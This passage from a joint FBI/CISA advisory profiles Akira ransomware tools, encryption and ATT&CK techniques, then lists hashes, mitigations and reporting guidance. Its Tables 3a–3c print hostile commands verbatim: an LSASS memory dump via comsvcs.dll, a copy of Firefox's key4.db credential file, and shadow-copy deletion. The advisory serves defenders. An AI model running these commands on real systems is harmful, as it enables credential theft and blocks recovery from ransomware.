According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[5], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [T1003.001].[6] Akira threat actors also use credential scraping tools [T1003] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [T1016] and net Windows commands are used to identify domain controllers [T1018] and gather information on domain trust relationships [T1482].

See Table 1 for a descriptive listing of these tools.

Defense Evasion

Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).

As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[4] and terminate antivirus-related processes [T1562.001].

Exfiltration and Impact

Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [T1537] to connect to exfiltration servers.

Akira threat actors use a double-extortion model [T1657] and encrypt systems [T1486] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.

Encryption

Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [T1486]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira’s encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [T1490]. Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each users’ home directory (C:\Users).

Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:

• -p --encryption_path (targeted file/folder paths)
• -s --share_file (targeted network drive path)
• -n --encryption_percent (percentage of encryption)
• --fork (create a child process for encryption

The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “vmonly” and the ability to stop running virtual machines with “stopvm” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “akiranew” or add a ransom note named “akiranew.txt” in directories where files were encrypted with the new nomenclature.

Leveraged Tools

Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 1: Tools Leveraged by Akira Ransomware Actors Name Description AdFind AdFind.exe is used to query and retrieve information from Active Directory. Advanced IP Scanner A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin). AnyDesk A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer. LaZagne Allows users to recover stored passwords on Windows, Linux, and OSX systems. PCHunter64 A tool used to acquire detailed process and system information [T1082].[7] PowerShell A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS. Mimikatz Allows users to view and save authentication credentials such as Kerberos tickets. Ngrok A reverse proxy tool [T1090] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address. RClone A command line program used to sync files with cloud storage services [T1567.002] such as Mega. SoftPerfect A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters. WinRAR Used to split compromised data into segments and to compress [T1560.001] files into .RAR format for exfiltration. WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts. Indicators of Compromise

Disclaimer: Investigation or vetting of these indicators is recommended prior to taking action, such as blocking.

Table 2a: Malicious Files Affiliated with Akira Ransomware File Name Hash (SHA-256) Description w.exe d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca Akira ransomware Win.exe dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e Akira ransomware encryptor AnyDesk.exe bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 Remote desktop application Gcapi.dll 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf DLL file that assists with the execution of AnyDesk.exe Sysmon.exe 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 Ngrok tool for persistence Config.yml Varies by use Ngrok configuration file Rclone.exe aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 Exfiltration tool Winscp.rnd 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 Network file transfer program WinSCP-6.1.2-Setup.exe 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c Network file transfer program Akira_v2

3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75

0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c

Akira_v2 ransomware Megazord

ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc

dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198

131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07

9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c

9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065

2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83

7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be

95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a

0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d

C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0

Akira “Megazord” ransomware VeeamHax.exe aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d Plaintext credential leaking tool Veeam-Get-Creds.ps1 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 PowerShell script for obtaining and decrypting accounts from Veeam servers PowershellKerberos TicketDumper 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 Kerberos ticket dumping tool from LSA cache sshd.exe 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 OpenSSH Backdoor sshd.exe 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 OpenSSH Backdoor ipscan-3.9.1-setup.exe 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 Network scanner that scans IP addresses and ports Table 2b: Malicious Files Affiliated with Akira Ransomware File Name Hash (MD5) Description winrar-x64-623.exe 7a647af3c112ad805296a22b2a276e7c Network file transfer program Table 3a: Commands Affiliated with Akira Ransomware Persistence and Discovery nltest /dclist: [T1018] nltest /DOMAIN_TRUSTS [T1482] net group “Domain admins” /dom [T1069.002] net localgroup “Administrators” /dom [T1069.001] tasklist [T1057] rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [T1003.001] Table 3b: Commands Affiliated with Akira Ransomware Credential Access

cmd.exe /Q /c esentutl.exe /y

"C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db" /d

"C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db.tmp”

Note: Used for accessing Firefox data.

Table 3c: Commands Affiliated with Akira Ransomware Impact powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" [T1490] MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4 -12 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 4: Initial Access Technique Title ID Use Valid Accounts T1078 Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access. Exploit Public Facing Application T1190 Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems. External Remote Services T1133 Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access. Phishing: Spearphishing Attachment  T1566.001 Akira threat actors use phishing emails with malicious attachments to gain access to networks. Phishing: Spearphishing Link  T1566.002 Akira threat actors use phishing emails with malicious links to gain access to networks.  Table 5: Credential Access Technique Title ID Use OS Credential Dumping T1003 Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.

OS Credential Dumping:

LSASS Memory

T1003.001 Akira threat actors attempt to access credential material stored in the process memory of the LSASS. Table 6: Discovery Technique Title ID Use System Network Configuration Discovery  T1016 Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure. System Information Discovery T1082 Akira threat actors use tools like PCHunter64 to acquire detailed process and system information. Domain Trust Discovery T1482 Akira threat actors use the net Windows command to enumerate domain information. Process Discovery T1057 Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell. Permission Groups Discovery: Local Groups T1069.001 Akira threat actors use the net localgroup /dom to find local system groups and permission settings. Permission Groups Discovery: Domain Groups  T1069.002 Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings. Remote System Discovery T1018 Akira threat actors use nltest / dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network. Table 7: Persistence Technique Title ID Use Create Account: Domain Account T1136.002 Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence. Table 8: Defense Evasion Technique Title ID Use Impair Defenses: Disable or Modify Tools T1562.001 Akira threat actors use BYOVD attacks to disable antivirus software. Table 9: Command and Control Technique Title ID Use Remote Access Software T1219 Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems. Proxy T1090 Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data.  Table 10: Collection Technique Title ID Use Archive Collected Data: Archive via Utility T1560.001 Akira threat actors use tools like WinRAR to compress files. Table 11: Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Akira threat actors use file transfer tools like WinSCP to transfer data. Transfer Data to Cloud Account T1537 Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control. Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data.  Table 12: Impact Technique Title ID Use Date Encrypted for Impact T1486 Akira threat actors encrypt data on target systems to interrupt availability to system and network resources. Inhibit System Recovery T1490 Akira threat actors delete volume shadow copies on Windows systems. Financial Theft T1657 Akira threat actors use a double-extortion model for financial gain. MITIGATIONS Network Defenders

The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S].
• Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [CPG 2.C].
• Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
• Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems. [CPG 1.E].
• Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
• Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.
• Install, regularly update, and enable real time detection for antivirus software on all hosts.
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
• Disable unused ports [CPG 2.V].
• Consider adding an email banner to emails received from outside of your organization [CPG 2.M].
• Disable hyperlinks in received emails.
• Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
• Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].
• Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted, and/or only have irretrievable data. 
• Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Tables 4 -12).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

• Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
• Resource to mitigate a ransomware attack: #StopRansomware Guide.
• No cost cyber hygiene services: Cyber Hygiene Services, Ransomware Readiness Assessment.

REFERENCES

1. Fortinet: Ransomware Roundup - Akira
2. Cisco: Akira Ransomware Targeting VPNs without MFA
3. Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259
4. TrendMicro: Akira Ransomware Spotlight
5. CrowdStrike: What is a Kerberoasting Attack?
6. Sophos: Akira, again: The ransomware that keeps on taking
7. Sophos: Akira Ransomware is “bringin’ 1988 back”

REPORTING

Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.

The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or (888) 282-0870).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.

ACKNOWLEDGEMENTS

Cisco and Sophos contributed to this advisory.

VERSION HISTORY

April 18, 2024: Initial version.